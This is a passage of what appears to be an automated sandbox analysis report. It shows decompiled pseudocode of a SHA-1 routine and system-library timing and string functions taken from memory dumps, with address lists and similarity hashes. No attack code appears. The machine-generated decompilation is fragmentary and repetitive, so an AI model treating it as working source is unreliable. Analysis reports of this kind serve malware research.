					_t453 = (_t365 ^ _t284 ^ _t352) +  *((intOrPtr*)(_t549 + _t488 * 4 - 0x148)) + _t536 + _v16 - 0x359d3e2a;
					_v16 = _t365;
					_t377 = _v12;
					_v12 = _t453;
					asm("rol edx, 0x5");
					_v16 = _t284;
					asm("ror ecx, 0x2");
					_t308 = (_t284 ^ _t352 ^ _t377) +  *((intOrPtr*)(_t549 + _t488 * 4 - 0x144)) + _t453 + _v16 - 0x359d3e2a;
					_t412 = _v12;
					_v12 = _t308;
					asm("rol eax, 0x5");
					_v16 = _t352;
					_t543 = (_t352 ^ _t377 ^ _t412) +  *((intOrPtr*)(_t549 + _t488 * 4 - 0x140)) + _t308 + _v16 - 0x359d3e2a;
					_t310 = _t377;
					_v8 = _t352;
					asm("ror edx, 0x2");
					_v8 = _t377;
					_t365 = _v12;
					_v12 = _t543;
					asm("rol esi, 0x5");
					_t487 = _t488 + 5;
					_t510 = (_t310 ^ _t412 ^ _t365) +  *((intOrPtr*)(_t549 + _t488 * 4 - 0x13c)) + _t543 + _v16 - 0x359d3e2a;
					_v16 = _t310;
					_t284 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t412;
					_v12 = _t510;
					_v8 = _t487;
				} while (_t487 < 0x50);
				_t489 = _a4;
				_t489[2] = _t489[2] + _t365;
				_t489[3] = _t489[3] + _t412;
				_t316 = _t489[4] + _v16;
				 *_t489 =  *_t489 + _t510;
				_t489[1] = _t489[1] + _t284;
				_t489[4] = _t316;
				_t489[0x17] = 0;
				return _t316;
			}

0x00408c2f
0x00408c31
0x00408c3b
0x00408c3f
0x00408c41
0x00408c41
0x00408c44
0x00408c66
0x00408c8c
0x00408cb2
0x00408cd4
0x00408cdb
0x00408cde
0x00408ce1
0x00408cea
0x00408cf0
0x00408cf7
0x00408d08
0x00408d0b
0x00408d0e
0x00408d12
0x00408d14
0x00408d16
0x00408d1f
0x00408d22
0x00408d25
0x00408d30
0x00408d36
0x00408d38
0x00408d38
0x00408d3b
0x00408d3e
0x00408d3e
0x00408d43
0x00408d45
0x00408d48
0x00408d4b
0x00408d51
0x00408d54
0x00408d57
0x00408d60
0x00408d66
0x00408d6f
0x00408d7e
0x00408d85
0x00408d88
0x00408d8b
0x00408d94
0x00408d97
0x00408d9a
0x00408db2
0x00408db9
0x00408dbb
0x00408dbe
0x00408dc1
0x00408dca
0x00408dd1
0x00408dd4
0x00408dd7
0x00408de6
0x00408ded
0x00408df0
0x00408df3
0x00408dfc
0x00408e06
0x00408e09
0x00408e15
0x00408e18
0x00408e1f
0x00408e22
0x00408e25
0x00408e2a
0x00408e2d
0x00408e36
0x00408e47
0x00408e4a
0x00408e4d
0x00408e54
0x00408e57
0x00408e5a
0x00408e5d
0x00408e5f
0x00408e62
0x00408e65
0x00408e6e
0x00408e73
0x00408e73
0x00408e88
0x00408e8b
0x00408e8e
0x00408e95
0x00408e98
0x00408e9b
0x00408eb0
0x00408eb7
0x00408eba
0x00408ebe
0x00408ec1
0x00408ec6
0x00408ec9
0x00408ed8
0x00408edb
0x00408ee2
0x00408ee5
0x00408ee8
0x00408eeb
0x00408eee
0x00408ef6
0x00408f04
0x00408f07
0x00408f0a
0x00408f0a
0x00408f11
0x00408f14
0x00408f17
0x00408f1f
0x00408f2d
0x00408f30
0x00408f37
0x00408f3a
0x00408f3d
0x00408f40
0x00408f43
0x00408f4c
0x00408f53
0x00408f53
0x00408f59
0x00408f72
0x00408f75
0x00408f7c
0x00408f7f
0x00408f82
0x00408f94
0x00408f9e
0x00408fa1
0x00408faa
0x00408fad
0x00408fb4
0x00408fb7
0x00408fbd
0x00408fd0
0x00408fd7
0x00408fda
0x00408fdd
0x00408fe0
0x00408fe9
0x00408fec
0x00408fff
0x00409002
0x0040900c
0x0040900f
0x00409011
0x0040901a
0x0040901d
0x00409030
0x00409036
0x00409039
0x00409040
0x00409042
0x00409045
0x00409048
0x0040904b
0x0040904e
0x00409051
0x0040905a
0x0040905f
0x00409062
0x00409062
0x00409075
0x00409078
0x0040907b
0x00409082
0x00409085
0x00409088
0x0040908b
0x0040909e
0x004090a1
0x004090ac
0x004090af
0x004090bb
0x004090be
0x004090c4
0x004090c7
0x004090ca
0x004090d1
0x004090e1
0x004090e4
0x004090ea
0x004090ed
0x004090f4
0x004090f6
0x004090f9
0x004090fc
0x004090ff
0x00409102
0x00409109
0x00409118
0x0040911b
0x00409122
0x00409125
0x00409128
0x0040912b
0x0040912e
0x00409131
0x00409134
0x0040913d
0x0040914e
0x00409156
0x0040915c
0x0040915f
0x00409161
0x00409164
0x00409167
0x00409174

Strings

(, xrefs: 00408F4C

Memory Dump Source

Source File: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 036bfce716f565c2b6c38fd9a58ae653f35c927947dd3ad3836ba1fe9141efae
Instruction ID: af24011f6afc0e1ef707b4405b39d63d0ecbfea5ae6caa243fb9bf7ddc0ee880
Opcode Fuzzy Hash: 036bfce716f565c2b6c38fd9a58ae653f35c927947dd3ad3836ba1fe9141efae
Instruction Fuzzy Hash: 1A022CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80

Uniqueness

Uniqueness Score: -1.00%

Function 00408C30, Relevance: 1.7, Strings: 1, Instructions: 423
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E00408C30(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t325;
				signed int _t334;
				signed int _t340;
				signed int _t341;
				signed int _t346;
				signed int _t353;
				signed int _t357;
				signed int _t358;
				signed int _t362;
				signed int _t365;
				signed int _t369;
				signed int _t370;
				signed int _t399;
				signed int _t404;
				signed int _t410;
				signed int _t413;
				signed int _t420;
				signed int _t423;
				signed int _t432;
				signed int _t434;
				signed int _t437;
				signed int _t445;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t470;
				signed int _t478;
				signed int _t479;
				signed int* _t480;
				signed int* _t481;
				signed int _t488;
				signed int _t491;
				signed int _t496;
				signed int _t499;
				signed int _t502;
				signed int _t505;
				signed int _t506;
				signed int _t510;
				signed int _t522;
				signed int _t525;
				signed int _t532;
				void* _t536;

				_t481 = _a4;
				_t353 = 0;
				_t2 =  &(_t481[7]); // 0x1b
				_t277 = _t2;
				do {
					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
					_t353 = _t353 + 4;
					_t277 =  &(_t277[0x10]);
				} while (_t353 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t399 =  *(_t278 - 0x18);
					_t459 =  *(_t278 - 0x14);
					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
					_t278[8] = _t357;
					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t318 ^ _t399;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
				} while ( *_t46 != 0);
				_t320 =  *_t481;
				_t279 = _t481[1];
				_t358 = _t481[2];
				_t404 = _t481[3];
				_v12 = _t320;
				_v16 = _t481[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t462 = _v8;
					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t323 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t404;
					_v12 = _t488;
					asm("rol esi, 0x5");
					_v8 = _t358;
					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t491 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t362 = _v12;
					_v8 = _t323;
					_t325 = _v8;
					_v12 = _t410;
					asm("rol edx, 0x5");
					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t413 = _v12;
					_v16 = _t491;
					asm("ror ecx, 0x2");
					_v8 = _t362;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t325;
					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t358 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t413;
					_v12 = _t496;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t404 = _v8;
					asm("ror ecx, 0x2");
					_t463 = _t462 + 5;
					_t320 = _t499;
					_v12 = _t320;
					_v8 = _t463;
				} while (_t463 < 0x14);
				_t464 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t404;
					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t334 = _v12;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t505 = _t279;
					_v16 = _t358;
					_t365 = _v12;
					_v12 = _t420;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t423 = _v12;
					_v8 = _t334;
					_v8 = _t365;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t464 = _t464 + 5;
					_t358 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t423;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_t404 = _v8;
					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
				} while (_t464 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t404;
					asm("ror eax, 0x2");
					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
					_t470 = _v12;
					_v12 = _t510;
					asm("rol esi, 0x5");
					_t340 = _v8;
					asm("ror edi, 0x2");
					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
					_v16 = _t358;
					_t369 = _v12;
					_v12 = _t432;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t470;
					_v12 = _t434;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t437 = _t369;
					_t358 = _v12;
					_v8 = _t437;
					_v12 = _t522;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
					_t404 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
					_t341 = _t340 + 5;
					_v8 = _t341;
				} while (_t341 < 0x3c);
				_t478 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t479 = _v8;
					asm("ror eax, 0x2");
					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
					_t346 = _v12;
					_v16 = _t404;
					_v12 = _t525;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
					_v16 = _t358;
					_t370 = _v12;
					_v12 = _t445;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
					_t404 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t346;
					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t370;
					_v8 = _t346;
					asm("ror edx, 0x2");
					_v8 = _t370;
					_t358 = _v12;
					_v12 = _t532;
					asm("rol esi, 0x5");
					_t478 = _t479 + 5;
					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t404;
					_v12 = _t499;
					_v8 = _t478;
				} while (_t478 < 0x50);
				_t480 = _a4;
				_t480[2] = _t480[2] + _t358;
				_t480[3] = _t480[3] + _t404;
				_t311 = _t480[4] + _v16;
				 *_t480 =  *_t480 + _t499;
				_t480[1] = _t480[1] + _t279;
				_t480[4] = _t311;
				_t480[0x17] = 0;
				return _t311;
			}

0x00408c3b
0x00408c3f
0x00408c41
0x00408c41
0x00408c44
0x00408c66
0x00408c8c
0x00408cb2
0x00408cd4
0x00408cdb
0x00408cde
0x00408ce1
0x00408cea
0x00408cf0
0x00408cf7
0x00408d08
0x00408d0b
0x00408d0e
0x00408d12
0x00408d14
0x00408d16
0x00408d1f
0x00408d22
0x00408d25
0x00408d30
0x00408d36
0x00408d38
0x00408d38
0x00408d3b
0x00408d3e
0x00408d3e
0x00408d43
0x00408d45
0x00408d48
0x00408d4b
0x00408d51
0x00408d54
0x00408d57
0x00408d60
0x00408d66
0x00408d6f
0x00408d7e
0x00408d85
0x00408d88
0x00408d8b
0x00408d94
0x00408d97
0x00408d9a
0x00408db2
0x00408db9
0x00408dbb
0x00408dbe
0x00408dc1
0x00408dca
0x00408dd1
0x00408dd4
0x00408dd7
0x00408de6
0x00408ded
0x00408df0
0x00408df3
0x00408dfc
0x00408e06
0x00408e09
0x00408e15
0x00408e18
0x00408e1f
0x00408e22
0x00408e25
0x00408e2a
0x00408e2d
0x00408e36
0x00408e47
0x00408e4a
0x00408e4d
0x00408e54
0x00408e57
0x00408e5a
0x00408e5d
0x00408e5f
0x00408e62
0x00408e65
0x00408e6e
0x00408e73
0x00408e73
0x00408e88
0x00408e8b
0x00408e8e
0x00408e95
0x00408e98
0x00408e9b
0x00408eb0
0x00408eb7
0x00408eba
0x00408ebe
0x00408ec1
0x00408ec6
0x00408ec9
0x00408ed8
0x00408edb
0x00408ee2
0x00408ee5
0x00408ee8
0x00408eeb
0x00408eee
0x00408ef6
0x00408f04
0x00408f07
0x00408f0a
0x00408f0a
0x00408f11
0x00408f14
0x00408f17
0x00408f1f
0x00408f2d
0x00408f30
0x00408f37
0x00408f3a
0x00408f3d
0x00408f40
0x00408f43
0x00408f4c
0x00408f53
0x00408f53
0x00408f59
0x00408f72
0x00408f75
0x00408f7c
0x00408f7f
0x00408f82
0x00408f94
0x00408f9e
0x00408fa1
0x00408faa
0x00408fad
0x00408fb4
0x00408fb7
0x00408fbd
0x00408fd0
0x00408fd7
0x00408fda
0x00408fdd
0x00408fe0
0x00408fe9
0x00408fec
0x00408fff
0x00409002
0x0040900c
0x0040900f
0x00409011
0x0040901a
0x0040901d
0x00409030
0x00409036
0x00409039
0x00409040
0x00409042
0x00409045
0x00409048
0x0040904b
0x0040904e
0x00409051
0x0040905a
0x0040905f
0x00409062
0x00409062
0x00409075
0x00409078
0x0040907b
0x00409082
0x00409085
0x00409088
0x0040908b
0x0040909e
0x004090a1
0x004090ac
0x004090af
0x004090bb
0x004090be
0x004090c4
0x004090c7
0x004090ca
0x004090d1
0x004090e1
0x004090e4
0x004090ea
0x004090ed
0x004090f4
0x004090f6
0x004090f9
0x004090fc
0x004090ff
0x00409102
0x00409109
0x00409118
0x0040911b
0x00409122
0x00409125
0x00409128
0x0040912b
0x0040912e
0x00409131
0x00409134
0x0040913d
0x0040914e
0x00409156
0x0040915c
0x0040915f
0x00409161
0x00409164
0x00409167
0x00409174

Strings

(, xrefs: 00408F4C

Memory Dump Source

Source File: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction ID: a760168a662120acd43970b1a42ec0693a9684a7b94152c1fab78c51280979bb
Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction Fuzzy Hash: 9D022DB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80

Uniqueness

Uniqueness Score: -1.00%

Function 0303B944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0303B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x310d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E03037D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E030E8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E03059E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0305B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0305CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E03037D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E030E8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0305AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x3108628; // 0x0
								_v68 = _t77;
								_t78 =  *0x310862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x3108628; // 0x0
							_t116 =  *0x310862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x0303b94c
0x0303b956
0x0303b95c
0x0303b95e
0x0303b964
0x0303b969
0x0303b96d
0x0303b96d
0x0303b970
0x0303b974
0x0303b97a
0x0303badf
0x0303badf
0x0303bae2
0x0303bae4
0x0303bae6
0x0303baf0
0x03082cb8
0x0303baf6
0x0303baf6
0x0303baf6
0x0303bafd
0x0303bb1f
0x0303bb1f
0x0303baff
0x0303bb00
0x0303bb00
0x0303bb03
0x0303bb03
0x0303bacb
0x0303bacf
0x0303bad0
0x0303bad1
0x0303badc
0x0303badc
0x0303b980
0x0303b980
0x0303b988
0x0303b98b
0x0303b98d
0x0303b990
0x0303b993
0x0303b999
0x0303b99b
0x0303b9a1
0x0303b9a5
0x0303b9aa
0x0303b9b0
0x0303b9bb
0x0303b9c0
0x0303b9c3
0x0303b9ca
0x0303b9cc
0x0303b9cf
0x0303b9d3
0x0303b9d7
0x0303ba94
0x0303ba94
0x0303ba98
0x0303baa3
0x03082ccb
0x0303baa9
0x0303baa9
0x0303baa9
0x0303bab1
0x03082cd5
0x03082cdd
0x03082cdd
0x0303babb
0x0303babc
0x0303bac2
0x0303bac3
0x0303bac3
0x0303bac6
0x00000000
0x0303b9dd
0x0303b9dd
0x0303b9e7
0x0303b9e7
0x0303b9ec
0x0303b9ec
0x0303b9f1
0x0303b9f5
0x0303b9fa
0x0303ba00
0x0303ba0c
0x0303ba10
0x0303ba10
0x0303ba12
0x0303ba18
0x00000000
0x00000000
0x0303bb26
0x0303bb26
0x0303ba1e
0x0303ba1e
0x0303ba23
0x0303ba25
0x0303ba2c
0x0303ba30
0x0303ba35
0x0303ba35
0x0303ba41
0x0303ba46
0x0303ba4c
0x0303ba50
0x0303ba54
0x0303ba6a
0x0303ba6e
0x0303ba70
0x0303ba74
0x0303ba78
0x0303ba7a
0x0303ba7c
0x0303ba8e
0x0303ba90
0x0303ba92
0x0303bb14
0x0303bb14
0x0303bb16
0x0303bb16
0x00000000
0x0303ba7c
0x0303bb0a
0x0303bb0d
0x00000000
0x00000000
0x00000000
0x0303bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0303B9A5

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 539033bad20c49f33c5e310388ad53b5ff5996b8edfa5f75677326988dccc562
Instruction ID: e5c78d7272421494d1114d71a1bded2f43bc5c601c3713622b357fc32f828ac8
Opcode Fuzzy Hash: 539033bad20c49f33c5e310388ad53b5ff5996b8edfa5f75677326988dccc562
Instruction Fuzzy Hash: 91515A71A0AB04CFC724DF29C48092BFBE9FB89618F14896EF98587354D771E844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0301B171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0301B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x30ef7a8);
				E0306D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0306D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0305D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0305F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
